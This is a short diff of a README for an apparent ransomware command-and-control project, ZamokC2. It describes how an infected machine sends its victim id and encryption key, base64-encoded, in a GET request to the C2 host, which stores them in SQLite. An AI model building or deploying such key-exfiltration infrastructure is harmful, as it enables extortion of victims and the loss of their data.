nemuelw/ZamokC2/README.md

     GET http://c2.server:8080/<SOME_STRING>
     ```
     Where :
+    - c2.server is the URL or IP Address where the C2 is running
     - SOME_STRING is a base64 string of a unique victim machine id and the encryption/decryption key concatenated with a :
 4. The C2 breaks down the request and gets the 2 values : the id and the key
 5. It saves these values to an SQLite database locally